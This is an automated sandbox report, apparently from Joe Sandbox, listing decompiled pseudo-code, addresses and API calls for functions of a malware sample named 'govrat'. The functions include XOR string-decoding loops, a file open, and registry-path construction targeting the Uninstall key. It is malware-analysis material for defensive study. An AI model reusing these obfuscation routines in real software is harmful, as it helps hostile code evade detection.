Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095F9B1, Relevance: 3.0, APIs: 2, Instructions: 34windowsleep

APIs

SendMessageW.USER32(0000004A,00000000,?), ref: 0095FA00
Sleep.KERNELBASE(00000000), ref: 0095FA03

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00958793, Relevance: 3.0, APIs: 2, Instructions: 15

APIs

RtlEncodePointer.NTDLL(00000004,?,?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 0095879F
RtlEncodePointer.NTDLL(-00000004,?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 009587A7

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00953268, Relevance: 2.5, APIs: 2, Instructions: 17

C-Code - Quality: 72%

			E00953268(void* __ebx) {
				void* _t3;
				void* _t6;

				_t6 = TlsGetValue( *0x972908);
				_t7 = _t6;
				if(_t6 == 0) {
					_push( *0x9738d8);
					_push(__ebx); // executed
					_t3 = L009775C6(_t1, __ebx, _t7); // executed
					_t6 = _t3;
					TlsSetValue( *0x972908, _t6);
				}
				return _t6;
			}

0x00953277
0x00953279
0x0095327b
0x0095327d
0x00953283
0x00953284
0x00953289
0x00953292
0x00953292
0x0095329b

APIs

TlsGetValue.KERNEL32 ref: 00953271
TlsSetValue.KERNEL32(00000000), ref: 00953292

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00960BBC, Relevance: 1.7, APIs: 1, Instructions: 226

C-Code - Quality: 96%

			E00960BBC(intOrPtr* _a4) {
				void* _v12;
				WCHAR* _v24;
				char _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				char _v40;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				char _v60;
				short _v62;
				short _v64;
				short _v66;
				intOrPtr _v70;
				char _v72;
				char _v76;
				short _v78;
				intOrPtr _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				char _v92;
				char _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				char _v112;
				char _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				short _v124;
				short _v126;
				short _v128;
				intOrPtr _v132;
				short _v134;
				char _v136;
				char _v138;
				short _v140;
				short _v142;
				short _v144;
				short _v146;
				short _v148;
				short _v150;
				short _v152;
				intOrPtr _v156;
				short _v158;
				short _v160;
				short _v162;
				char _v164;
				struct _SECURITY_ATTRIBUTES* _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				char _v200;
				void* __esi;
				signed int _t153;
				signed int _t155;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				void* _t170;
				void* _t172;
				void* _t241;
				void* _t243;
				void* _t245;

				_t243 = _t245;
				_v24 = _a4 + 8;
				_v96 = 0x497;
				_v98 = 0x497;
				_v100 = 0x4e5;
				_v102 = 0x4e2;
				_v104 = 0x4f4;
				_v106 = 0x497;
				_v108 = 0x4c4;
				_v110 = 0x4ba;
				_v112 = 0x4d1;
				_v62 = 0x498;
				_v72 = 0x4c8;
				_v30 = 0x499;
				_v32 = 0x4b9;
				_v64 = 0x4f9;
				_v34 = 0x4cd;
				_v66 = 0x4fc;
				_v46 = 0x49a;
				_v48 = 0x4fb;
				_v50 = 0x4e8;
				_v36 = 0x4dc;
				_v52 = 0x4f3;
				_v54 = 0x4ec;
				_v56 = 0x4db;
				_v140 = 0x49b;
				_v142 = 0x4bb;
				_v144 = 0x4e9;
				_v146 = 0x4fe;
				_v148 = 0x4ff;
				_v150 = 0x4f5;
				_v94 = 0;
				_v70 = 0x4f604f9;
				_v60 = 0;
				_v40 = 0x4ca04dc;
				_v28 = 0;
				_v44 = 0;
				_v152 = 0x4fe;
				_v156 = 0x4fd04fe;
				_v158 = 0x4ff;
				_v160 = 0x4ef;
				_v84 = 0x4f3;
				_v162 = 0x4f2;
				_v86 = 0x4e8;
				_v164 = 0x4d9;
				_v78 = 0x49c;
				_v90 = 0x4f3;
				_v88 = 0x4ee;
				_v92 = 0x4d2;
				_v116 = 0x49d;
				_v118 = 0x4bd;
				_v120 = 0x4e4;
				_v122 = 0x4f6;
				_v126 = 0x4ef;
				_v134 = 0x4fc;
				_v136 = 0x4d6;
				_v138 = 0;
				_v82 = 0x4bc04f2;
				_v76 = 0;
				_v124 = 0x4ee;
				_v128 = 0x4f8;
				_v132 = 0x4ed04ee;
				_v114 = 0;
				_t153 = 0;
				do {
					 *(_t243 + _t153 * 2 - 0x6c) =  *(_t243 + _t153 * 2 - 0x6c) ^ 0x00000497;
					_t153 = _t153 + 1;
				} while (_t153 < 9);
				_v200 =  &_v112;
				_v94 = 1;
				_t155 = 0;
				do {
					 *(_t243 + _t155 * 2 - 0x44) =  *(_t243 + _t155 * 2 - 0x44) ^ 0x00000498;
					_t155 = _t155 + 1;
				} while (_t155 < 6);
				_v196 =  &_v72;
				_v60 = 1;
				_t157 = 0;
				do {
					 *(_t243 + _t157 * 2 - 0x24) =  *(_t243 + _t157 * 2 - 0x24) ^ 0x00000499;
					_t157 = _t157 + 1;
				} while (_t157 < 6);
				_v192 =  &_v40;
				_v28 = 1;
				_t159 = 0;
				do {
					 *(_t243 + _t159 * 2 - 0x34) =  *(_t243 + _t159 * 2 - 0x34) ^ 0x0000049a;
					_t159 = _t159 + 1;
				} while (_t159 < 6);
				_v188 =  &_v56;
				_v44 = 1;
				_t161 = 0;
				do {
					 *(_t243 + _t161 * 2 - 0xa0) =  *(_t243 + _t161 * 2 - 0xa0) ^ 0x0000049b;
					_t161 = _t161 + 1;
				} while (_t161 < 0xd);
				_v184 =  &_v164;
				_v138 = 1;
				_t163 = 0;
				do {
					 *(_t243 + _t163 * 2 - 0x58) =  *(_t243 + _t163 * 2 - 0x58) ^ 0x49c;
					_t163 = _t163 + 1;
				} while (_t163 < 8);
				_v180 =  &_v92;
				_v76 = 1;
				_t165 = 0;
				do {
					 *(_t243 + _t165 * 2 - 0x84) =  *(_t243 + _t165 * 2 - 0x84) ^ 0x49d;
					_t165 = _t165 + 1;
				} while (_t165 < 0xb);
				_t211 = _a4;
				_v176 =  &_v136;
				_v114 = 1;
				_v172 = 0;
				if(L0095DD8D( &_v200,  *_a4,  *((intOrPtr*)(_t211 + 4))) != 0) {
					L17:
					_t170 = 0x2b;
					return _t170;
				} else {
					_pop(_t241);
					L0097951F(_t169, _t241);
					_t172 = CreateFileW(_v24, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_v12 = _t172;
					if(_t172 == 0xffffffff) {
						goto L17;
					} else {
						_push(0);
						_push(_t172);
						return L009EB134(_t172);
					}
				}
			}

0x00960bbd
0x00960bce
0x00960bd6
0x00960bdf
0x00960be8
0x00960bef
0x00960bf8
0x00960bfe
0x00960c07
0x00960c0e
0x00960c17
0x00960c1e
0x00960c2c
0x00960c35
0x00960c3c
0x00960c40
0x00960c4c
0x00960c53
0x00960c5e
0x00960c65
0x00960c6e
0x00960c72
0x00960c7b
0x00960c82
0x00960c89
0x00960c90
0x00960c9a
0x00960ca4
0x00960cb2
0x00960cbc
0x00960cc6
0x00960ccf
0x00960cd2
0x00960cd9
0x00960cdc
0x00960ce3
0x00960ce6
0x00960ce9
0x00960cf0
0x00960cfa
0x00960d06
0x00960d11
0x00960d15
0x00960d22
0x00960d29
0x00960d35
0x00960d3b
0x00960d42
0x00960d46
0x00960d4f
0x00960d56
0x00960d5d
0x00960d64
0x00960d6a
0x00960d74
0x00960d7e
0x00960d85
0x00960d8b
0x00960d92
0x00960d95
0x00960d99
0x00960d9d
0x00960da4
0x00960da7
0x00960da9
0x00960dae
0x00960db3
0x00960db4
0x00960dbc
0x00960dc2
0x00960dc6
0x00960dc8
0x00960dcd
0x00960dd2
0x00960dd3
0x00960ddb
0x00960de1
0x00960de5
0x00960de7
0x00960dec
0x00960df1
0x00960df2
0x00960dfa
0x00960e00
0x00960e04
0x00960e06
0x00960e0b
0x00960e10
0x00960e11
0x00960e19
0x00960e1f
0x00960e23
0x00960e25
0x00960e2a
0x00960e32
0x00960e33
0x00960e3e
0x00960e44
0x00960e4b
0x00960e4d
0x00960e4f
0x00960e54
0x00960e55
0x00960e5d
0x00960e63
0x00960e67
0x00960e69
0x00960e6b
0x00960e73
0x00960e74
0x00960e79
0x00960e85
0x00960e94
0x00960e98
0x00960ea7
0x00961064
0x00961066
0x0096106b
0x00960ead
0x00960ead
0x00960eae
0x00960ec7
0x00960ec9
0x00960ecf
0x00000000
0x00960ed5
0x00960ed5
0x00960ed6
0x00960edc
0x00960edc
0x00960ecf

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00960EC7

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0096334D, Relevance: 1.7, APIs: 1, Instructions: 191

C-Code - Quality: 67%

			E0096334D() {
				void* _t140;
				signed int _t143;
				void* _t209;

				 *((short*)(_t209 - 0x3e)) = 0x12d;
				 *((short*)(_t209 - 0x40)) = 0x10a;
				 *((short*)(_t209 - 0x42)) = 0x14a;
				 *((short*)(_t209 - 0x44)) = 0x143;
				 *((short*)(_t209 - 0x46)) = 0x144;
				 *((short*)(_t209 - 0x48)) = 0x143;
				 *((short*)(_t209 - 0x4a)) = 0x143;
				 *((short*)(_t209 - 0x4c)) = 0x158;
				 *((short*)(_t209 - 0x4e)) = 0x17f;
				 *((short*)(_t209 - 0x50)) = 0x10a;
				 *((short*)(_t209 - 0x52)) = 0x10d;
				 *((short*)(_t209 - 0x54)) = 0x168;
				 *((short*)(_t209 - 0x56)) = 0x166;
				 *((short*)(_t209 - 0x58)) = 0x164;
				 *((short*)(_t209 - 0x5a)) = 0x161;
				 *((short*)(_t209 - 0x5c)) = 0x10d;
				 *((short*)(_t209 - 0x5e)) = 0x148;
				 *((short*)(_t209 - 0x60)) = 0x159;
				 *((short*)(_t209 - 0x62)) = 0x14c;
				 *((short*)(_t209 - 0x64)) = 0x159;
				 *((short*)(_t209 - 0x66)) = 0x17e;
				 *((short*)(_t209 - 0x68)) = 0x10d;
				 *((short*)(_t209 - 0x6a)) = 0x169;
				 *((short*)(_t209 - 0x6c)) = 0x163;
				 *((short*)(_t209 - 0x6e)) = 0x16c;
				 *((short*)(_t209 - 0x70)) = 0x10d;
				 *((short*)(_t209 - 0x72)) = 0x10a;
				 *((short*)(_t209 - 0x74)) = 0x149;
				 *((short*)(_t209 - 0x76)) = 0x143;
				 *((short*)(_t209 - 0x78)) = 0x148;
				 *((short*)(_t209 - 0x7a)) = 0x14b;
				 *((short*)(_t209 - 0x7c)) = 0x148;
				 *((short*)(_t209 - 0x7e)) = 0x169;
				 *((short*)(_t209 - 0x80)) = 0x143;
				 *((short*)(_t209 - 0x88)) = 0x10d;
				 *((short*)(_t209 - 0x8a)) = 0x110;
				 *((short*)(_t209 - 0x8c)) = 0x10d;
				 *((short*)(_t209 - 0x8e)) = 0x148;
				 *((short*)(_t209 - 0x90)) = 0x140;
				 *((short*)(_t209 - 0x92)) = 0x14c;
				 *((short*)(_t209 - 0x94)) = 0x163;
				 *((short*)(_t209 - 0x96)) = 0x10d;
				 *((short*)(_t209 - 0x82)) = 0x144;
				 *((short*)(_t209 - 0x98)) = 0x148;
				 *((short*)(_t209 - 0x9a)) = 0x15f;
				 *((short*)(_t209 - 0x9c)) = 0x148;
				 *((short*)(_t209 - 0x9e)) = 0x145;
				 *((short*)(_t209 - 0xa0)) = 0x17a;
				 *((short*)(_t209 - 0xa2)) = 0x10d;
				 *((short*)(_t209 - 0xa4)) = 0x148;
				 *((short*)(_t209 - 0xa6)) = 0x14e;
				 *((short*)(_t209 - 0xa8)) = 0x144;
				 *((short*)(_t209 - 0xaa)) = 0x15b;
				 *((short*)(_t209 - 0xba)) = 0x144;
				 *((short*)(_t209 - 0xac)) = 0x15f;
				 *((short*)(_t209 - 0xbc)) = 0x17a;
				 *((short*)(_t209 - 0xbe)) = 0x10d;
				 *((short*)(_t209 - 0xae)) = 0x148;
				 *((short*)(_t209 - 0xb0)) = 0x17e;
				 *((short*)(_t209 - 0xc0)) = 0x140;
				 *((short*)(_t209 - 0xb2)) = 0x172;
				 *((short*)(_t209 - 0xc6)) = 0x14b;
				 *((short*)(_t209 - 0xce)) = 0x159;
				 *((short*)(_t209 - 0xb4)) = 0x11f;
				 *((short*)(_t209 - 0xd0)) = 0x14e;
				 *((short*)(_t209 - 0xb6)) = 0x11e;
				 *((short*)(_t209 - 0xd2)) = 0x148;
				 *((short*)(_t209 - 0xb8)) = 0x143;
				 *((short*)(_t209 - 0xc8)) = 0x10d;
				 *((short*)(_t209 - 0xd8)) = 0x17e;
				 *((intOrPtr*)(_t209 - 0x86)) = 0x17a010a;
				 *((intOrPtr*)(_t209 - 0xc4)) = 0x142015f;
				 *((intOrPtr*)(_t209 - 0xcc)) = 0x107010d;
				 *((intOrPtr*)(_t209 - 0xd6)) = 0x1410148;
				 *((char*)(_t209 - 0x3c)) = 0;
				 *((short*)(_t209 - 0xc)) = 0x12e;
				 *((short*)(_t209 - 0x12)) = 0x14f;
				 *((short*)(_t209 - 0x14)) = 0x160;
				 *((intOrPtr*)(_t209 - 0x10)) = 0x14b0143;
				 *((char*)(_t209 - 0xa)) = 0;
				 *0x96c228(_t209 - 0xe8);
				if( *((intOrPtr*)(_t209 - 0xa)) != 0) {
					L4:
					_t140 = E0095D2FF(0,  *((intOrPtr*)(_t209 - 8)), 0x14b, L0095106C(_t209 - 0xd8), _t209 - 0x14, _t209 - 0xe8); // executed
					if(_t140 != 0 &&  *((short*)(_t209 - 0xe8)) == 8) {
						 *((intOrPtr*)(_t209 - 0x18)) = 1;
					}
					_push(_t209 - 0xe8);
					return L009C2758(_t209 - 0xe8, 0x143);
				}
				_t143 = 0;
				do {
					 *(_t209 + _t143 * 2 - 0x14) =  *(_t209 + _t143 * 2 - 0x14) ^ 0x12e;
					_t143 = _t143 + 1;
				} while (_t143 < 5);
				 *((char*)(_t209 - 0xa)) = 1;
				goto L4;
			}

0x00963355
0x0096335b
0x00963362
0x0096336b
0x00963374
0x0096337a
0x0096337e
0x00963385
0x0096338c
0x00963392
0x0096339b
0x009633a2
0x009633a9
0x009633b0
0x009633b7
0x009633bd
0x009633c6
0x009633cd
0x009633d4
0x009633db
0x009633e2
0x009633e8
0x009633ef
0x009633f6
0x009633fd
0x00963403
0x00963409
0x00963410
0x00963416
0x0096341c
0x00963423
0x00963429
0x00963430
0x00963436
0x0096343c
0x00963446
0x0096344f
0x00963458
0x00963462
0x0096346c
0x00963476
0x0096347f
0x00963488
0x00963491
0x0096349d
0x009634a6
0x009634b0
0x009634ba
0x009634c3
0x009634cc
0x009634d6
0x009634df
0x009634e9
0x009634f0
0x009634fc
0x00963503
0x0096350c
0x00963518
0x00963522
0x00963529
0x00963538
0x0096353f
0x0096354e
0x00963558
0x00963562
0x00963569
0x00963574
0x0096357e
0x00963585
0x00963591
0x00963598
0x009635a2
0x009635ac
0x009635b6
0x009635c0
0x009635c5
0x009635cc
0x009635d3
0x009635de
0x009635e5
0x009635e8
0x009635f1
0x00963606
0x00963620
0x0096362a
0x00963636
0x00963636
0x00963643
0x00000000
0x00963644
0x009635f3
0x009635f5
0x009635f7
0x009635fc
0x009635fd
0x00963602
0x00000000

APIs

VariantInit.OLEAUT32(?), ref: 009635E8

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095D4FA, Relevance: 1.6, APIs: 1, Instructions: 147
library

C-Code - Quality: 63%

			E0095D4FA(struct HINSTANCE__* __eax, void* __ebx, short __esi) {
				short _t58;
				short _t59;
				short _t60;
				short _t61;
				short _t62;
				short _t63;
				short _t64;
				short _t65;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t78;
				short _t80;
				short _t81;
				short _t82;
				short _t84;
				short _t85;
				short _t86;
				short _t88;
				short _t90;
				short _t91;
				short _t93;
				short _t94;
				short _t95;
				short _t98;
				short _t99;
				short _t100;
				short _t101;
				short _t103;
				short _t104;
				short _t105;
				short _t106;
				short _t109;
				void* _t112;

				GetProcAddress(__eax, ??); // executed
				_t58 = 0x53;
				 *((short*)(_t112 - 0x144)) = _t58;
				_t59 = 0x4f;
				 *((short*)(_t112 - 0x142)) = _t59;
				_t60 = 0x46;
				 *((short*)(_t112 - 0x140)) = _t60;
				_t61 = 0x54;
				 *((short*)(_t112 - 0x13e)) = _t61;
				_t62 = 0x57;
				 *((short*)(_t112 - 0x13c)) = _t62;
				_t63 = 0x41;
				 *((short*)(_t112 - 0x13a)) = _t63;
				_t64 = 0x52;
				 *((short*)(_t112 - 0x138)) = _t64;
				_t65 = 0x45;
				 *((short*)(_t112 - 0x136)) = _t65;
				_t66 = 0x5c;
				 *((short*)(_t112 - 0x134)) = _t66;
				_t78 = 0x4d;
				 *((short*)(_t112 - 0x132)) = _t78;
				 *((short*)(_t112 - 0x130)) = __esi;
				_t80 = 0x63;
				 *((short*)(_t112 - 0x12e)) = _t80;
				_t81 = 0x72;
				 *((short*)(_t112 - 0x12c)) = _t81;
				_t82 = 0x6f;
				 *((short*)(_t112 - 0x12a)) = _t82;
				_t91 = 0x73;
				 *((short*)(_t112 - 0x128)) = _t91;
				_t84 = 0x6f;
				 *((short*)(_t112 - 0x126)) = _t84;
				_t85 = 0x66;
				 *((short*)(_t112 - 0x124)) = _t85;
				_t86 = 0x74;
				 *((short*)(_t112 - 0x122)) = _t86;
				 *((short*)(_t112 - 0x120)) = _t66;
				_t88 = 0x57;
				 *((short*)(_t112 - 0x11e)) = _t88;
				 *((short*)(_t112 - 0x11c)) = __esi;
				_t90 = 0x6e;
				 *((short*)(_t112 - 0x11a)) = _t90;
				_t93 = 0x64;
				 *((short*)(_t112 - 0x118)) = _t93;
				_t94 = 0x6f;
				 *((short*)(_t112 - 0x116)) = _t94;
				_t95 = 0x77;
				 *((short*)(_t112 - 0x114)) = _t95;
				 *((short*)(_t112 - 0x112)) = _t91;
				 *((short*)(_t112 - 0x110)) = _t66;
				_t98 = 0x43;
				 *((short*)(_t112 - 0x10e)) = _t98;
				_t99 = 0x75;
				 *((short*)(_t112 - 0x10c)) = _t99;
				_t100 = 0x72;
				 *((short*)(_t112 - 0x10a)) = _t100;
				 *((short*)(_t112 - 0x108)) = _t100;
				_t101 = 0x65;
				 *((short*)(_t112 - 0x106)) = _t101;
				 *((short*)(_t112 - 0x104)) = _t90;
				_t103 = 0x74;
				 *((short*)(_t112 - 0x102)) = _t103;
				_t104 = 0x56;
				 *((short*)(_t112 - 0x100)) = _t104;
				_t105 = 0x65;
				 *((short*)(_t112 - 0xfe)) = _t105;
				_t106 = 0x72;
				 *((short*)(_t112 - 0xfc)) = _t106;
				 *((short*)(_t112 - 0xfa)) = _t91;
				 *((short*)(_t112 - 0xf8)) = __esi;
				_t109 = 0x6f;
				 *((short*)(_t112 - 0xf2)) = _t66;
				_t67 = 0x55;
				 *((short*)(_t112 - 0xf6)) = _t109;
				 *((short*)(_t112 - 0xf0)) = _t67;
				 *((short*)(_t112 - 0xf4)) = _t90;
				 *((short*)(_t112 - 0xee)) = _t90;
				 *((short*)(_t112 - 0xec)) = __esi;
				 *((short*)(_t112 - 0xea)) = _t90;
				 *((short*)(_t112 - 0xe8)) = _t91;
				_t69 = 0x74;
				 *((short*)(_t112 - 0xe6)) = _t69;
				_t70 = 0x61;
				 *((short*)(_t112 - 0xe4)) = _t70;
				_t71 = 0x6c;
				 *((short*)(_t112 - 0xe2)) = _t71;
				 *((short*)(_t112 - 0xe0)) = _t71;
				 *((short*)(_t112 - 0xde)) = 0;
				_push(_t112 - 0x2c);
				_push( *((intOrPtr*)(_t112 - 0x28)));
				_push(_t112 - 0x144);
				_push(0x80000002);
				return L00A084D3(_t112 - 0x144, _t91);
			}

0x0095d4fb
0x0095d503
0x0095d506
0x0095d50d
0x0095d510
0x0095d517
0x0095d51a
0x0095d521
0x0095d524
0x0095d52b
0x0095d52e
0x0095d535
0x0095d538
0x0095d53f
0x0095d542
0x0095d549
0x0095d54c
0x0095d553
0x0095d558
0x0095d55f
0x0095d560
0x0095d56b
0x0095d572
0x0095d575
0x0095d57c
0x0095d57f
0x0095d586
0x0095d587
0x0095d590
0x0095d595
0x0095d59c
0x0095d59f
0x0095d5a6
0x0095d5a9
0x0095d5b0
0x0095d5b3
0x0095d5bc
0x0095d5c3
0x0095d5c6
0x0095d5cf
0x0095d5d6
0x0095d5db
0x0095d5e2
0x0095d5e5
0x0095d5ec
0x0095d5ef
0x0095d5f6
0x0095d5f7
0x0095d602
0x0095d60b
0x0095d612
0x0095d615
0x0095d61c
0x0095d61f
0x0095d626
0x0095d629
0x0095d630
0x0095d637
0x0095d638
0x0095d643
0x0095d64a
0x0095d64d
0x0095d654
0x0095d657
0x0095d65e
0x0095d661
0x0095d668
0x0095d669
0x0095d672
0x0095d67d
0x0095d684
0x0095d685
0x0095d68e
0x0095d68f
0x0095d696
0x0095d6a1
0x0095d6a8
0x0095d6af
0x0095d6b6
0x0095d6bd
0x0095d6c6
0x0095d6c9
0x0095d6d0
0x0095d6d3
0x0095d6da
0x0095d6db
0x0095d6e2
0x0095d6eb
0x0095d6f5
0x0095d6f6
0x0095d700
0x0095d701
0x0095d70b

APIs

GetProcAddress.KERNEL32 ref: 0095D4FB

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009523B5, Relevance: 1.6, APIs: 1, Instructions: 54

C-Code - Quality: 19%

			E009523B5(void* __edi, void* __esi, intOrPtr _a4) {
				void* _t3;
				intOrPtr* _t9;
				void* _t14;
				void* _t19;
				intOrPtr* _t20;
				void* _t22;

				_t22 = __esi;
				_t19 = __edi;
				_t25 =  *0x9708d4;
				if( *0x9708d4 != 0 && L00958900(_t25, 0x9708d4) != 0) {
					 *0x9708d4(_a4);
				}
				L0095883E(_t19, _t22);
				_t3 = L00952391(0x96c2f4, 0x96c30c); // executed
				_pop(_t14);
				_t27 = _t3;
				if(_t3 == 0) {
					_push(_t22);
					_push(_t19);
					E00958827(_t14, _t27, 0x95802d); // executed
					_t20 = 0x96c2e4;
					if(0x96c2e4 >= 0x96c2f0) {
						L8:
						_t31 =  *0x976b30;
						if( *0x976b30 != 0 && L00958900(_t31, 0x976b30) != 0) {
							 *0x976b30(0, 2, 0);
						}
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						_t9 =  *_t20;
						if(_t9 != 0) {
							 *_t9();
						}
						_t20 = _t20 + 4;
					} while (_t20 < 0x96c2f0);
					goto L8;
				}
				return _t3;
			}

0x009523b5
0x009523b5
0x009523ba
0x009523c1
0x009523d5
0x009523db
0x009523dc
0x009523eb
0x009523f1
0x009523f2
0x009523f4
0x009523f6
0x009523f7
0x009523fd
0x0095240d
0x00952411
0x00952422
0x00952422
0x0095242b
0x00952442
0x00952442
0x00000000
0x00000000
0x00000000
0x00000000
0x00952413
0x00952413
0x00952413
0x00952417
0x00952419
0x00952419
0x0095241b
0x0095241e
0x00000000
0x00952413
0x0095244b

APIs

__initterm_e.LIBCMT ref: 009523EB

Part of subcall function 00958900: __FindPESection.LIBCMT ref: 0095895B

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0096049F, Relevance: 1.5, APIs: 1, Instructions: 27thread

APIs

RtlExitUserThread.NTDLL ref: 009604B4

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00961EF0, Relevance: 1.5, APIs: 1, Instructions: 27

APIs

SHParseDisplayName.SHELL32(?,00000000,?,20000000,00000000), ref: 00961F09

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00961F30, Relevance: 1.5, APIs: 1, Instructions: 23

C-Code - Quality: 100%

			E00961F30(void* __eax, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* _t7;
				char _t9;
				void* _t10;
				void* _t11;
				void* _t15;

				_t10 = __edi;
				_t11 = __eax - 1;
				_t9 = 0;
				_t7 = E00951AE5(__edi, _t11, _a4, _a8); // executed
				if(_t7 < 0) {
					L4:
					 *((char*)(_t11 + _t10)) = _t9;
					_t9 = 0x8007007a;
					L5:
					return _t9;
				}
				_t15 = _t7 - _t11;
				if(_t15 > 0) {
					goto L4;
				}
				if(_t15 == 0) {
					 *((char*)(_t11 + __edi)) = 0;
				}
				goto L5;
			}

0x00961f30
0x00961f36
0x00961f3d
0x00961f41
0x00961f4b
0x00961f58
0x00961f58
0x00961f5b
0x00961f61
0x00961f64
0x00961f64
0x00961f4d
0x00961f4f
0x00000000
0x00000000
0x00961f51
0x00961f53
0x00961f53
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 00961F41

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

